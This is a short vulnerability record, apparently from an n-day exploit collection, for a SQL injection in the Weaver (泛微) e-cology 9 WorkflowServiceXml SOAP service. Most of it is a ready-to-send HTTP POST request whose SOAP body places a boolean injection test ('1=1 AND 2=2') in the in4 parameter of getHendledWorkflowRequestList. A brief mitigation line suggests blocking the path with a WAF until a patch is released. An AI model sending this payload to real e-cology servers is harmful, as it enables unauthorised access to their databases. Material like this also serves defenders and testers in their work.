vendor = "泛微"
name = "泛微e-cology 9 WorkflowServiceXml SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/services/WorkflowServiceXml"
detail = "POST /services/WorkflowServiceXml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 Content-Length: 422 Connection: close Content-Type: text/xml Accept-Encoding: gzip <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"http://webservices.workflow.weaver\"> <soapenv:Header/> <soapenv:Body> <web:getHendledWorkflowRequestList> <web:in0>1</web:in0> <web:in1>1</web:in1> <web:in2>1</web:in2> <web:in3>1</web:in3> <web:in4> <web:string>1=1 AND 2=2</web:string> </web:in4> </web:getHendledWorkflowRequestList> </soapenv:Body> </soapenv:Envelope>"
fix = "WAF封禁路径，等待发布补丁"
date = "0724"
label = "nday"
